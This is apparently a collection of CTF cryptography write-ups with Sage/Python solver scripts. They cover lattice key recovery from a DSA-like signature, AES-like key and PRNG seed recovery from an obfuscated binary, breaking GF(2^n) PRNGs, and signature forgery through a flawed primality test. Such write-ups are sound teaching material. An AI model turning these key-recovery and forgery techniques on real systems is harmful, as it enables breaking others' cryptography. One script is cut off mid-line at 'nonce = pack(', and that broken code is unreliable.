$$k – h(m)/s – xr/s \equiv 0 \pmod{q}.$$

$$k + B + Ax \equiv 0 \pmod{q}.$$

Assume that we know bounds on $x$ and $k$, $X$ and $K$ respectively. Then we can build the following lattice (the basis vectors are rows):

$$
\begin{pmatrix}
q & 0 & 0 \\
0 & qX & 0 \\
B & AX & K \\
\end{pmatrix}
$$

Basically we encode the equation and add two additional vectors to encode modular reductions. If $XK < q - \epsilon$ then the $LLL$-reduced basis of this lattice will contain two linear equations holding over integers with roots $x$ and $k$. Unfortunately, the secrets are 150 bits instead of 128 so the bound does not hold. We can try to guess some higher bits and run the LLL attack each time, but we need to guess roughly $300-256=44$ bits which is too much.

It is easy to get some solution within the bounds. There are roughly $2^{44}$ of them and we actually need to check all of them! One check can be to verify $x$ against the public key $y = g^x \mod p$. Another way is to use $h(x)$ given in STDOUT, which is probably faster, but still too slow.

Let’s think how to generate all solutions for the given bounds once we have some solution. If $k_0 + B + Ax_0 \equiv 0$, then we want to find small $\Delta_k, \Delta_x$ such that

$$(k_0 + \Delta_k) + B + A(x_0 + \Delta_x) \equiv 0 \pmod{q}.$$

$$\Rightarrow \Delta_k + A\Delta_x \equiv 0 \pmod{q}.$$

Consider the lattice:

$$
\begin{pmatrix}
1 & -A \\
0 & q \\
\end{pmatrix}
$$

The vectors in the lattices are all possible pairs $(\Delta_x,\Delta_k)$. Moreover, the LLL-reduced basis will contain small and somewhat orthogonal vectors $(\Delta_x^{(0)}, \Delta_k^{(0)})$ and $(\Delta_x^{(1)}, \Delta_k^{(1)})$. By adding small multiplies of these vectors to $(x_0,k_0)$ we can find almost all solutions up to the bound. Note that we are interested mostly only in the $x$ coordinate. The solutions have $x$ of the following form:

$$x = x_0 + i \Delta_x^{(0)} + j \Delta_x^{(1)}$$

where $i,j$ are relatively small integers (up to few millions in our case). It is too much to check… But can we use other equations? At a first glance, they are exponential and it is hard to use them here in a way other then simply verifying $x$ or $k$. However, it is actually easy: we can split search on $i$ and $j$ by using the equation $y = g^x \mod p$. This is similar to Meet-In-The-Middle / Baby-Step-Giant-Step attacks. First, we precompute a table for all $j$: $\{ yg^{-j \Delta_x^{(1)}} \mapsto j\}$ . Then we check for all $i$ if $g^{x_0 + i \Delta_x^{(0)}}$ is in the table. When we find it, we can easily compute $x$ from $i$ and $j$!

Here is full sage code, it finds the flag in a few minutes:

from sage.all import *

Y = 4675975961034321318962575265110114310875697301524971406479091223605006115642041321079605682629390144148862285125353335575850114862081357772478008490889403608973023515499959473374820321940514939155187478991555363073408293339373770407404120884229693036839637631846964085605936966005664594330150750220123106270473482589454510979171010750141467635389981140248292523060541588378749922037870081811431605806877184957731660006793364727129226828277168254826229733536459158767652636094988369367622055662565355698632032334469812735980006733267919815359221578068741143213061033728991446898051375393719722707555958912382769606279
P = 32163437489387646882545837937802838313337646833974044466731567532754579958012875893665844191303548189492604123505522382770478442837553069890471993483164949504735527438665048438808440494922021062011062567528480025060283867381823427214512155583444236623145440836252289902783715682554658231606320310129833109191138313801289027627739243726679212643242494506530838323607821437997048235272405577079630284307474612832155381483129670050964475785090109743586694668757059662450206919471125303517989042945192886030308203029077484932328302318567286732217365609075794327329327141979774234522455646843538377559711464098301949684161
Q = 81090202316656819994650163122592145880088893063907447574390172288558447451623
H = 88030618649759997479497646248126770071813905558516408828543254210959719582166
R = 34644971883866574753209424578777685962679178432833890467656897732184789528635
S = 19288448359668464692653054736434794709227686774726460500150496018082350808676
G = pow(2, int(P//Q), P)

A = (-R) * inverse_mod(S, Q) % Q
B = (-H) * inverse_mod(S, Q) % Q

while 1:
    XB = 125
    KB = 125-16
    X = 2**XB
    K = 2**KB
    khigh = randint(0, 2**16)
    Bnew = B + khigh * 2**KB

    m = matrix(ZZ, 3, 3, [
        Q,    0,      0,
        0,    Q * X,  0,
        Bnew, A * X,  K
    ]).LLL()

    mat = []
    target = []
    for row in m[:2]:
        const, cx, ck = row
        assert cx % X == 0 and ck % K == 0
        mat.append([cx / X, ck / K])
        target.append(-const)

    mat = matrix(ZZ, mat)
    try:
        x0, k0 = mat.solve_right(vector(ZZ, target))
        if int(x0) != x0 or int(k0) != k0:
            continue
    except ValueError:
        continue
    x0, k0 = int(x0), int(k0)

    assert (A * x0 + k0 + Bnew) % Q == 0
    k0 += khigh * 2**KB
    assert (A * x0 + k0 + B) % Q == 0

    print "SOLUTION", x0, k0
    print "SIZE %.02f %.02f" % (RR(log(abs(x0), 2)), RR(log(abs(k0), 2)))
    break


BOUND1 = 10**7
BOUND2 = 10**7

MZ = matrix(ZZ, 2, 2, [
    [1, -A],
    [0, Q],
]).LLL()

DX1 = abs(MZ[0][0])
DX2 = abs(MZ[1][0])

print "STEP1"
table = {}
step = pow(G, DX2, P)
curg = Y * inverse_mod( int(pow(step, BOUND1, P)), P ) % P
cure = -BOUND1
for i in xrange(-BOUND1, BOUND1):
    if i % 100000 == 0:
        print i / 100000, "/", BOUND1 / 100000
    assert curg not in table
    table[curg] = cure
    curg = (curg * step) % P
    cure += 1
print

print "STEP2"
step = pow(G, DX1, P)
curg = pow(G, x0 - DX1 * BOUND2, P)
cure = -BOUND2
for i in xrange(-BOUND2, BOUND2):
    if i % 100000 == 0:
        print i / 100000, "/", BOUND2 / 100000
    if curg in table:
        print "Solved!", cure, table[curg]
        ans = x0 + cure * DX1 - table[curg] * DX2
        print "Flag: CTF{%d}" % ans
        break
    curg = (curg * step) % P
    cure += 1

The flag: CTF{848525996645405165419773118980458599114509814}

Google CTF 2017 Quals – Crypto writeups

hellman — Mon, 19 Jun 2017 08:39:29 +0000

Scripts with short explanations for all crypto tasks (except RSA) from Google CTF Quals 2017:

Crypto Backdoor
Introspective CRC
Shake It
RSA CTF Challenge (no writeup, but I think it’s similar to this old one)
Rubik
Bleichenbacher’s Lattice Task (full writeup here)

0CTF 2017 Quals – Zer0llvm

hellman — Mon, 20 Mar 2017 07:54:22 +0000

Talent Yang loves to customize his own obfuscator. Unfortunately, he lost his seed when he was watching Arsenal’s UEFA game. What a sad day! His team and his seed were lost together. To save him, could you help him to get back his seed? We can not save the game, but we may be able to find out his seed.
Compile: ollvm.clang -Xclang -load -Xclang lib0opsPass.so -mllvm -oopsSeed=THIS_IS_A_FAKE_SEED source.c
Clang && LLVM Version: 3.9.1
link
flag format: flag{seed}

Summary: deobfuscating and attacking AES parts.

In this challenge we are given an obfuscation plugin for llvm and an obfuscated binary. The plugin accepts a 16-byte seed as a parameter and uses it for internal PRNG. Our goal is to analyze the binary and recover the seed from it.

The binary is basically a big state machine. Here is start of the main function:

.text:4004C0 main:           ; DATA XREF: _start+1D
.text:4004C0     push rbp
.text:4004C1     mov  rbp, rsp
.text:4004C4     sub  rsp, 4038Ch
.text:4004CB     mov  dword ptr [rbp-4], 0
.text:4004D2     mov  dword ptr [rbp-8], 46544330h
.text:4004D9     mov  dword ptr [rbp-0Ch], 4E52BCE7h
.text:4004E0
.text:4004E0 main_switch:       ; CODE XREF: .text:loc_7635AC
.text:4004E0     mov  eax, [rbp-0Ch]
.text:4004E3     mov  ecx, eax
.text:4004E5     sub  ecx, 8000DEEAh
.text:4004EB     mov  [rbp-10h], eax
.text:4004EE     mov  [rbp-14h], ecx
.text:4004F1     jz   loc_728049
.text:4004F7     jmp  $+5
.text:4004FC
.text:4004FC loc_4004FC:        ; CODE XREF: .text:00000000004004F7
.text:4004FC     mov  eax, [rbp-10h]
.text:4004FF     sub  eax, 8001EACAh
.text:400504     mov  [rbp-18h], eax
.text:400507     jz   loc_73E38A
.text:40050D     jmp  $+5
.text:400512
.text:400512 loc_400512:        ; CODE XREF: .text:000000000040050D
.text:400512     mov  eax, [rbp-10h]
.text:400515     sub  eax, 8003CC64h
.text:40051A     mov  [rbp-1Ch], eax
.text:40051D     jz   loc_5C0C95
.text:400523     jmp  $+5
...

In pseudocode, it could be something like this:

state = 0x4E52BCE7
main_switch:
switch(state) {
    case 0x8000DEEA: goto loc_728049;
    case 0x8001EACA: goto loc_73E38A;
    case 0x8003CC64: goto loc_5C0C95;
    ...
}
loc_xxxxxx:
   // do something
   state = 0x8003CC64
   goto main_switch

Note that the state ids are sorted as signed 32-bit integers. Also, during the case probing, some intermediate data is written to the stack (i.e. [rbp-14h] and lower), but there are no further reads from that area. By running the binary and checking for system calls with strace we can see that it does not do anything useful. Let’s look at the llvm plugin to see how the seed is used.

lib0opsPass.so

The plugin is written in C++ and exports a bunch of functions. The main function of our interest is Oops::OopsFlattening::flatten(). Though it’s quite big, we can quickly locate interesting parts by looking at cross-references from crypto-related functions.

First it calls prng_seed to seed its internal PRNG state:

Oops::CryptoUtils::prng_seed(cryptoutils, &seed_string);

Then it uses the PRNG to generate 16 bytes:

memset(&key, 0, 0x20uLL);
LODWORD(cryptoutils_) = llvm::ManagedStatic::operator->(&Oops::Oopscryptoutils, 0LL);
Oops::CryptoUtils::get_bytes(cryptoutils_, &key, 16);
if ( crc32('FTC0', &key, 3) != 0xF9E319A6 )
...

Note that the hardcoded crc32 check allows us to easily find the first 3 bytes of the generated key: 179, 197, 140.

The key is then used to “scramble” values from a hardcoded array called plains:

LODWORD(plains0) = plains[0];
LODWORD(v35) = llvm::ManagedStatic::operator->(&Oops::Oopscryptoutils, v33);
v36 = plains0;
v37 = Oops::CryptoUtils::scramble32(v35, plains0, &key);
...
v60 = counter++;
plainsCUR = plains[v60];
LODWORD(v62) = llvm::ManagedStatic::operator->(&Oops::Oopscryptoutils, v59);
v63 = Oops::CryptoUtils::scramble32(v62, plainsCUR, &key);

It’s not clear for now how these “scrambled” values are used later. IDA tells us that there are around $2^{16}$ values in the array:

.data:2345E0 ; _DWORD plains[65806]
.data:2345E0 plains          dd 0F6172961h, 0CB973739h, 904F3728h, 0DB7194B9h, 81E0B166h
...

Probably it is possible to look at the LLVM-related code and see how exactly these values are used. But in the obfuscated binary there are not so many random-looking words. The only ones which come to mind are the state ids!

Let’s log all the state ids passed to the main_switch. Here is a simple gdb script for it:

$ cat >cmd
set confirm off
set pagination off
break *0x04004e3
commands
p/x $eax
cont
end
run

$ gdb -x cmd -n ./0llvm log
$ head -30 log
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
...
Reading symbols from ./0llvm...(no debugging symbols found)...done.
Breakpoint 1 at 0x4004e3

Breakpoint 1, 0x00000000004004e3 in main ()
$1 = 0x4e52bce7

Breakpoint 1, 0x00000000004004e3 in main ()
$2 = 0x3ac545da

Breakpoint 1, 0x00000000004004e3 in main ()
$3 = 0xff97c58e

Breakpoint 1, 0x00000000004004e3 in main ()
$4 = 0xe83342dd

$ tail log
Breakpoint 1, 0x00000000004004e3 in main ()
$65789 = 0xf1dbf041

Breakpoint 1, 0x00000000004004e3 in main ()
$65790 = 0xdb9a21b8

Breakpoint 1, 0x00000000004004e3 in main ()
$65791 = 0xb02b5689
[Inferior 1 (process 10622) exited with code 027]
(gdb) quit

65791 values! Quite close to 65801 found in IDA. The hypothesis seems to be true. But what does it give us now?

Recovering key

What we have found is that we have $~2^{16}$ pairs of plaintext/ciphertext under the “scramble32” function. Let’s look at it closer:

__int64 __fastcall Oops::CryptoUtils::scramble32(
    Oops::CryptoUtils *this, unsigned int x, const char *key)
{
  int v3; // ST20_4@1
  int v4; // ST24_4@1
  int v5; // ST20_4@1

  v3 = AES_PRECOMP_TE3[(x ^ key[3])] ^
       AES_PRECOMP_TE2[(BYTE1(x) ^ key[2])] ^
       AES_PRECOMP_TE1[((x >> 16) ^ key[1])] ^
       AES_PRECOMP_TE0[(BYTE3(x) ^ *key)];
  v4 = AES_PRECOMP_TE3[(v3 ^ key[7])] ^
       AES_PRECOMP_TE2[(BYTE1(v3) ^ key[6])] ^
       AES_PRECOMP_TE1[((v3 >> 16) ^ key[5])] ^
       AES_PRECOMP_TE0[(BYTE3(v3) ^ key[4])];
  v5 = AES_PRECOMP_TE3[(v4 ^ key[11])] ^
       AES_PRECOMP_TE2[(BYTE1(v4) ^ key[10])] ^
       AES_PRECOMP_TE1[((v4 >> 16) ^ key[9])] ^
       AES_PRECOMP_TE0[(BYTE3(v4) ^ key[8])];
  return AES_PRECOMP_TE3[(v5 ^ key[15])] ^
         AES_PRECOMP_TE2[(BYTE1(v5) ^ key[14])] ^
         AES_PRECOMP_TE1[((v5 >> 16) ^ key[13])] ^
         AES_PRECOMP_TE0[(BYTE3(v5) ^ key[12])] ^
         ((key[2] << 8) | (key[1] << 16) | (*key << 24) | key[3]);
}

Interesting, it is related to the AES block cipher. The AES_PRECOMP_TE tables map 8-bit values to 32-bit values. Possibly these tables implement MixColumns, or even together with SBoxes and xors. Let's compose them with inverse of MixColumns (aes.py):

from aes import AES
A = AES()

for i in xrange(4):
    for x, t in enumerate(AES_PRECOMP_TE[i]):
        t = [BYTE3(t), BYTE2(t), BYTE1(t), BYTE0(t)]
        t2 = A.mixColumn(list(t), isInv=True)
        print t2
    print

$ python precomp.py
[99, 0, 0, 0]
[124, 0, 0, 0]
[119, 0, 0, 0]
[123, 0, 0, 0]
[242, 0, 0, 0]
[107, 0, 0, 0]
...

This is the AES SBox applied to one of the bytes! It means that

AES_PRECOMP_TE[i](x) = MixColumns(SBox(x) << 8*i).

Therefore scramble32 is a 4-round iteration of XorKey, SubBytes, MixColumn followed by another XorKey. How do we recover the key?

Recall that we know key[0], key[1], key[2] from a CRC32 check. We can guess one-byte key[3] and bypass the first round easily. Luckily, the last whitening key is the same as the first one: with the same guess we can decrypt the last round aswell! By moving the keys through the linear layers and decrypring the linear layers, we arrive at two rounds:

XK | SB | MC | XK | SB | XK.

Let's use impossible polytopes. Assume that we have three plaintexts of the form (it is probable that we have such among the $2^{16}$ texts by birthday paradox):

X1 = (x1, a, b, c)
X2 = (x2, a, b, c)
X3 = (x3, a, b, c)

We will study how a difference tuple (X1 $\oplus$ X2, X1 $\oplus$ X3) propagates through the cipher. Since it is a difference, it propagates through the key addition untouched. After SubBytes a set of possible difference tuples expands up to $2^8$ elements. Since MixColumn is linear, any difference (x, y) propagates to (MixColumn(x), MixColumn(y)). Therefore, before the last SubBytes layer, we have only $2^8$ possible differences, which can easily be precomputed. Thus, we can recover the last key byte-by-byte: guess byte of the key, decrypt through S-Box, check difference tuple (note that the middle XK does not affect it). We are truncating the differences of 32-bit values to differences of 8-bit values, but this is fine since we look at pairs of differences: $2^8$ possible pairs out of $2^{16}$ give us $1/2^8$ filtration for each key byte. By tracking the first guessed key byte, we can ensure that only the correct key survives.

The full attack implementation is available here.

Recovering Seed

We have recovered the key, but the flag is the PRNG seed! How to recover it? The code for stream generation is as follows:

// in Oops::CryptoUtils::encrypt(Oops::CryptoUtils *this, unsigned __int8 *dst, unsigned __int8 *nonce, unsigned __int8 *seed)
memset(dst, 0, 0x10uLL);
v5 = *(nonce_ + 1);
*buf = *nonce_;
*buf2 = v5;
for ( i = 0; i <= 15; ++i ) {
  seedbyte = seed_[i];
  for ( j = 0; j <= 7; ++j ) {
    if ( seedbyte & 1 ) {
      for ( k = 0; k <= 15; ++k )
        dst[k] ^= buf[k];
    }
    seedbyte = seedbyte >> 1;
    for ( l = 0; l <= 15; ++l )
      buf[l] = TABLE[buf[l]];
  }
}

Here TABLE is an 8-bit nonlinear S-Box. Nonce is constant and hardcoded (note that it is increased by 1 before calling encrypt, as a big-endian number, see Oops::CryptoUtils::inc_ctr):

// in  Oops::CryptoUtils::prng_seed(struct CryptoUtils *cryptoutils, __int64 a2)
noncebuf = cryptoutils->nonce;
*noncebuf = 0xD7C59B4DFFD1E010LL;
*(noncebuf + 1) = 0x20C7C17B250E019ALL;

Though TABLE is nonlinear, the buf array is updated independently and therefore we can see its different versions as constants. Mixing of buf and seed is done linearly, so we can recover the seed from the PRNG output (which is the AES key) by simple linear algebra:

from sage.all import *

from struct import pack, unpack

def tobin(x, n):
    return tuple(map(int, bin(x).lstrip("0b").rjust(n, "0")))

def frombin(v):
    return int("".join(map(str, v)), 2 )

def tobinvec(v):
    return sum( [tobin(c, 8) for c in v], () )

PRNG_OUT = [179, 197, 140, 9, 31, 61, 9, 48, 214, 74, 172, 159, 200, 11, 185, 236]

TABLE = [0x0ED,0x67,0x7F,0x0F6,0x0C7,0x9A,0x24,0x12,0x0BA,0x83,0x49,0x0DB,0x13,0x0BF,0x61,0x0B0,0x0FF,0x69,0x80,0x0EC,0x0DE,0x4,0x63,0x0C4,0x96,0x73,0x1B,0x6E,0x0A6,0x9E,0x87,0x4B,0x0FC,0x10,0x2A,0x0C3,0x5C,0x2E,0x36,0x0B2,0x0DF,0x0E3,0x90,0x0FE,0x1A,0x0F,0x1C,0x84,0x1,0x15,0x3A,0x85,0x0A5,0x57,0x3F,0x6D,0x0F5,0x4A,0x0A,0x0D6,0x9F,0x64,0x0B5,0x0F7,0x8F,0x99,0x68,0x4D,0x17,0x0F9,0x0EE,0x0F0,0x3,0x6,0x4C,0x0BD,0x58,0x33,0x0A9,0x0DC,0x3C,0x0A3,0x3B,0x0D1,0x0BB,0x28,0x0F4,0x0B9,0x0CF,0x47,0x0A0,0x6A,0x0C2,0x19,0x0B,0x97,0x81,0x35,0x91,0x7C,0x5D,0x7A,0x48,0x2B,0x41,0x0D9,0x0CB,0x6F,0x56,0x8D,0x5A,0x0C5,0x3E,0x0D8,0x0C0,0x60,0x1F,0x9,0x0CA,0x7B,0x25,0x0E7,0x0AE,0x0F2,0x77,0x0FA,0x3D,0x50,0x0E2,0x4F,0x0C9,0x2C,0x53,0x45,0x0C1,0x0E9,0x46,0x0D,0x70,0x8A,0x0A1,0x0D5,0x94,0x92,0x88,0x95,0x9D,0x26,0x9B,0x0E4,0x5,0x44,0x11,0x2D,0x7,0x1E,0x0A4,0x38,0x0E1,0x0A8,0x52,0x89,0x0AF,0x40,0x72,0x0E5,0x0B4,0x7E,0x51,0x6C,0x0FB,0x76,0x62,0x0D4,0x8,0x9C,0x54,0x5B,0x75,0x29,0x0C6,0x66,0x0DA,0x0FD,0x14,0x86,0x78,0x16,0x0B6,0x8B,0x39,0x0E6,0x0B7,0x1D,0x0D3,0x18,0x0A7,0x30,0x0E8,0x23,0x37,0x7D,0x82,0x0BE,0x34,0x0C,0x55,0x0D0,0x0EF,0x0,0x0CD,0x0AC,0x0A2,0x4E,0x0B3,0x0AB,0x31,0x8E,0x21,0x0E0,0x22,0x74,0x5E,0x8C,0x32,0x0F8,0x0EB,0x2F,0x79,0x0F1,0x42,0x0C8,0x0DD,0x0CE,0x65,0x27,0x5F,0x20,0x0B8,0x0AA,0x0AD,0x71,0x6B,0x0D2,0x0EA,0x0BC,0x0E,0x0CC,0x98,0x2,0x59,0x43,0x0B1,0x93,0x0D7,0x0F3,]

# note 0x20... -> 0x21
nonce = pack("
The flag is: flag{B0s5x1AOb3At0bF~}

0CTF 2017 Quals – OneTimePad 1 and 2

hellman — Mon, 20 Mar 2017 07:54:15 +0000

I swear that the safest cryptosystem is used to encrypt the secret!
oneTimePad.zip

Well, maybe the previous one is too simple. So I designed the ultimate one to protect the top secret!
oneTimePad2.zip

Summary: breaking a linear and an LCG-style exponential PRNGs.

In this challenges we need to break a PRNG. We are given a part of the keystream and we need to recover another part to decrypt the flag.

OneTimePad1

The code:

from os import urandom

def process(m, k):
    tmp = m ^ k
    res = 0
    for i in bin(tmp)[2:]:
        res = res << 1;
        if (int(i)):
            res = res ^ tmp
        if (res >> 256):
            res = res ^ P
    return res

def keygen(seed):
    key = str2num(urandom(32))
    while True:
        yield key
        key = process(key, seed)

def str2num(s):
    return int(s.encode('hex'), 16)

P = 0x10000000000000000000000000000000000000000000000000000000000000425L

true_secret = open('flag.txt').read()[:32]
assert len(true_secret) == 32
print 'flag{%s}' % true_secret
fake_secret1 = "I_am_not_a_secret_so_you_know_me"
fake_secret2 = "feeddeadbeefcafefeeddeadbeefcafe"
secret = str2num(urandom(32))

generator = keygen(secret)
ctxt1 = hex(str2num(true_secret) ^ generator.next())[2:-1]
ctxt2 = hex(str2num(fake_secret1) ^ generator.next())[2:-1]
ctxt3 = hex(str2num(fake_secret2) ^ generator.next())[2:-1]
f = open('ciphertext', 'w')
f.write(ctxt1+'\n')
f.write(ctxt2+'\n')
f.write(ctxt3+'\n')
f.close()

The key observation here is that $process(m, k)$ is … just squaring of $m \oplus k$ in $GF(2^{256})$, with the irreducible polynomial given by $P$. To invert squaring, we can simply square $255$ times more:

c1 = 0xaf3fcc28377e7e983355096fd4f635856df82bbab61d2c50892d9ee5d913a07f
c2 = 0x630eb4dce274d29a16f86940f2f35253477665949170ed9e8c9e828794b5543c
c3 = 0xe913db07cbe4f433c7cdeaac549757d23651ebdccf69d7fbdfd5dc2829334d1b

k2 = c2 ^ str2num(fake_secret1)
k3 = c3 ^ str2num(fake_secret2)

kt = k3
for i in xrange(255):
    kt = process(kt, 0)

seed = kt ^ k2
print "SEED", seed
assert process(k2, seed) == k3

kt = k2
for i in xrange(255):
    kt = process(kt, 0)

k1 = kt ^ seed
print "K1", seed
assert process(k1, seed) == k2

m = k1 ^ c1
print `hex(m)[2:-1].decode("hex")`

The flag: flag{t0_B3_r4ndoM_en0Ugh_1s_nec3s5arY}

Another way to solve this is to see that process is linear (indeed, squaring in $GF(2^x)$ is linear) and can be inverted by linear algebra. More funny, a proper encoding of the problem for z3 yiels the result too, but only after ~1.5 hours on my laptop:

from z3.z3 import *

def proc(m, k):
    tmp = m ^ k
    res = 0
    for i in xrange(256):
        feedback = res >> 255
        res = res << 1
        mask = (tmp << i) >> 255
        res = res ^ (tmp & mask)
        res = res ^ (P & feedback)
    return res

# realk1 = k1
# realseed = seed

seed = BitVec("seed", 256)
k1 = BitVec("k1", 256)

s = Solver()
s.add(proc(k1, seed) == k2)
s.add(proc(k2, seed) == k3)

print "Solving..."
print s.check()
model = s.model()
k1 = int(model[k1].as_long())
print `hex(k1 ^ c1)[2:-1].decode("hex")`

OneTimePad 2

The code:

from os import urandom

def process1(m, k):
    res = 0
    for i in bin(k)[2:]:
        res = res << 1;
        if (int(i)):
            res = res ^ m
        if (res >> 128):
            res = res ^ P
    return res

def process2(a, b):
    res = []
    res.append(process1(a[0], b[0]) ^ process1(a[1], b[2]))
    res.append(process1(a[0], b[1]) ^ process1(a[1], b[3]))
    res.append(process1(a[2], b[0]) ^ process1(a[3], b[2]))
    res.append(process1(a[2], b[1]) ^ process1(a[3], b[3]))
    return res

def nextrand(rand):
    global N, A, B
    tmp1 = [1, 0, 0, 1]
    tmp2 = [A, B, 0, 1]
    s = N
    N = process1(N, N)
    while s:
        if s % 2:
            tmp1 = process2(tmp2, tmp1)
        tmp2 = process2(tmp2, tmp2)
        s = s / 2
    return process1(rand, tmp1[0]) ^ tmp1[1]


def keygen():
    key = str2num(urandom(16))
    while True:
        yield key
        key = nextrand(key)

def encrypt(message):
    length = len(message)
    pad = '\x00' + urandom(15 - (length % 16))
    to_encrypt = message + pad
    res = ''
    generator = keygen()
    f = open('key.txt', 'w') # This is used to decrypt and of course you won't get it.
    for i, key in zip(range(0, length, 16), generator):
        f.write(hex(key)+'\n')
        res += num2str(str2num(to_encrypt[i:i+16]) ^ key)
    f.close()
    return res

def decrypt(ciphertxt):
    # TODO
    pass

def str2num(s):
    return int(s.encode('hex'), 16)

def num2str(n, block=16):
    s = hex(n)[2:].strip('L')
    s = '0' * ((32-len(s)) % 32) + s
    return s.decode('hex')

P = 0x100000000000000000000000000000087
A = 0xc6a5777f4dc639d7d1a50d6521e79bfd
B = 0x2e18716441db24baf79ff92393735345
N = str2num(urandom(16))
assert N != 0

if __name__ == '__main__':
    with open('top_secret') as f:
        top_secret = f.read().strip()
    assert len(top_secret) == 16
    plain = "One-Time Pad is used here. You won't know that the flag is flag{%s}." % top_secret

    with open('ciphertxt', 'w') as f:
        f.write(encrypt(plain).encode('hex')+'\n')

This one is a bit trickier. Still, easy to spot – $process1(m, k)$ is a multiplication in $GF(2^{128})$. A closer look at $process2$ reveals that it is just a multiplication of two $2×2$ matricesn. What does $nextrand$ do? It implements a fast exponentiation. Let

$M = \begin{bmatrix}
A & B \\
1 & 0 \\
\end{bmatrix}$.

Then

$nextrand(rand) = M^N[0,0] \cdot rand + M^N[0,1]$,

and also $N$ is updated to $N^2$. What are the of values $M^N$ being used? Let’s look at powers of $M$ symbolically:

sage: R. = GF(2**128, name='a')[]
sage: M = matrix(R, [[a, b], [0, 1]])
sage: M
[a b]
[0 1]
sage: M**2
[    a^2 a*b + b]
[      0       1]
sage: M**3
[            a^3 a^2*b + a*b + b]
[              0               1]
sage: M**4
[                    a^4 a^3*b + a^2*b + a*b + b]
[                      0                       1]

Hmm, the first entry is simply $A^N$ and the second entry is equal to

$B(A^{N-1} + A^{N-2} + \ldots + 1) = B(A^N-1)/(A-1)$.

Therefore, we have the following equations:

$PRNG_1 = key$;
$PRNG_2 = A^N \cdot PRNG_1 + B(A^N-1)/(A-1)$;
$PRNG_3 = A^{N^2} \cdot PRNG_2 + B(A^{N^2}-1)/(A-1)$;
and so on, the exponent is squared each time.

Here $N$ is unknown, but we can’t solve for it directly. Let’s solve for $A^N$ first and then solve a discrete logarithm problem.

Let’s multiply the second equation by $(A-1)$:

$PRNG_2 \cdot (A-1) = A^N \cdot PRNG_1 \cdot (A-1) + B(A^N-1),$

$\Leftrightarrow A^N = \frac{PRNG_2 \cdot (A-1) + B}{PRNG_1 \cdot (A – 1) + B}$.

Thus we can compute $A^N$. To get $N$ we need to compute discrete logarithm in $GF(2^{128})$. There are subexponential algorithms, so that the 128-bit size is quite practical. Indeed, sage can do it in a few minutes:

from sage.all import *

plain = "One-Time Pad is used here. You won't know that the flag is flag{"
ct = "0da8e9e84a99d24d0f788c716ef9e99cc447c3cf12c716206dee92b9ce591dc0722d42462918621120ece68ac64e493a41ea3a70dd7fe2b1d116ac48f08dbf2b26bd63834fa5b4cb75e3c60d496760921b91df5e5e631e8e9e50c9d80350249c".decode("hex")

vals = []
for i in xrange(0, 64, 16):
    vals.append(str2num(plain[i:i+16]) ^ str2num(ct[i:i+16]))
    print "KEY %02d" % i, hex(vals[-1])

p0 = vals[0]
p1 = vals[1]
uppp = process1(p1, A ^ 1) ^ B
down = process1(p0, A ^ 1) ^ B
down = pow1(down, 2**128-2)  # inversion
AN = process1(uppp, down)
print "A^N", AN

def ntopoly(npoly):
    return sum(c*X**e
        for e, c in enumerate(Integer(npoly).bits()))

X = GF(2).polynomial_ring().gen()
poly = ntopoly(P)
F = GF(2**128, modulus=poly, name='a')
a = F.fetch_int(A)
an = F.fetch_int(AN)

N = int(discrete_log(an, a))
# takes ~1 minute
# N = 76716889654539547639031458229653027958
assert a**N == an

def keygen2(key):
    while True:
        yield key
        key = nextrand(key)

K = vals[0]
print "K", K
print "N", N
print `encrypt(ct, keygen2(K))`

The flag: flag{LCG1sN3ver5aFe!!}

33C3 CTF 2016 – beeblebrox (Crypto 350)

hellman — Sun, 19 Mar 2017 22:30:30 +0000

Make bad politicians resign!

nc 78.46.224.72 2048

files

Summary: factorization-based attack on a signature method

In this challenge we have access to a signature oracle, who does not sign a special message. Our goal is to obtain a valid signature for that special message.

Code for the oracle:

...
# msg and ctr are sent by the client
ctr = decode(ctr, 0, 2**32) # allowed range
h = hash(msg, ctr)
if msg == TARGET_MSG or not is_prime(h, 128):
    self.send_msg("Sorry, I can't sign that.")
else:
    exponent = modinv(h, PHI)
    signature = pow(S, exponent, MODULUS)
    self.send_msg("Here you are, darling!")
    self.send_msg(encode(signature, 256))
...

And for the challenge:

ctr = decode(ctr, 0, 2**32)
signature = decode(signature, 2, MODULUS)
h = hash(TARGET_MSG, ctr)
if msg == TARGET_MSG and pow(signature, h, MODULUS) == S
   and is_prime(h, 128):
    self.send_msg("Okay, I give up :(")
    self.send_msg("Here's your flag: " + FLAG)
else:
    self.send_msg("No.")

So far so good, but let’s look at the is_prime function:

def is_prime(n, c):
    if n <= 1: return False
    if n == 2 or n == 3: return True
    if n % 2 == 0: return False
    for _ in range(c):
        a = random.randrange(1, n)
        if not pow(a, n-1, n) != 1:
            return False
    return True

It is just a Fermat primality test! We could try to use Carmichael numbers, but hardly any hash of the TARGET_MSG with one of the $2^{32}$ nonces will be a Carmichael number.. Wait.. Look at this line: if not pow(a, n-1, n) != 1:. The condition is inverted! The not should not be there!

It turns out that is_prime accepts only odd composite numbers (not equal to 3). How can we use it?

The signatures look like this:

$sig(msg) = S^{1/h(msg,nonce)} \mod N$.

Since the primality test is wrong, we want to use factorizations. Indeed, if we know $S^{1/(kp)}$ we can compute

$(S^{1/(kp)})^k \mod N = S^{1/p} \mod N $.

In such a way we can collect $S^{1/p}$ for many small primes and hope that $h(msg,nonce)$ will be smooth, that is will contain only those small primes in its factorization.

But how do we combine signatures for two primes? That's slightly tricker. We don't have much options. Let's try to multiply the signatures:

$S^{1/p} S^{1/q} = S^{\frac{p+q}{pq}}$.

Not the $S^{1/(pq)}$ that we wanted.. But can we change $p+q$ to 1 somehow? Indeed, let's generalize our multiplication:

$(S^{1/p})^a (S^{b/q})^b = S^{a/p} S^{b/q} = S^{\frac{bp+aq}{pq}}$.

If $p$ and $q$ are coprime, then we can use the Extended Euclidian Algorithm to find parameters $a,b$ such that $bp+aq=1$ and we are done!

Data

We found that H = hash(TARGET_MSG, nonce=35856) has the following factorization:

sage: factor(15430531282988074152696358566534774123)
3 * 11 * 19 * 137 * 173 * 337 * 7841 * 107377 * 206597 * 3446693 * 5139341

And hash("blah", nonce) gives us all these prime factors for the following nonces:

nonces = [
    464628494, # 3
    513958308, # 11
    584146771, # 19
    501252653, # 137
    836242304, # 173
    119438940, # 337
    242937565, # 7841
    853304146, # 107377
    642736722, # 206597
    836398440, # 3446693
    54720172 , # 5139341
]

After implementing and running the attack, we get the flag: 33C3_DONT_USE_BRUTE_FORCE_AGAINST_POLITICIANS

hack you spb @ 17 Oct 2016

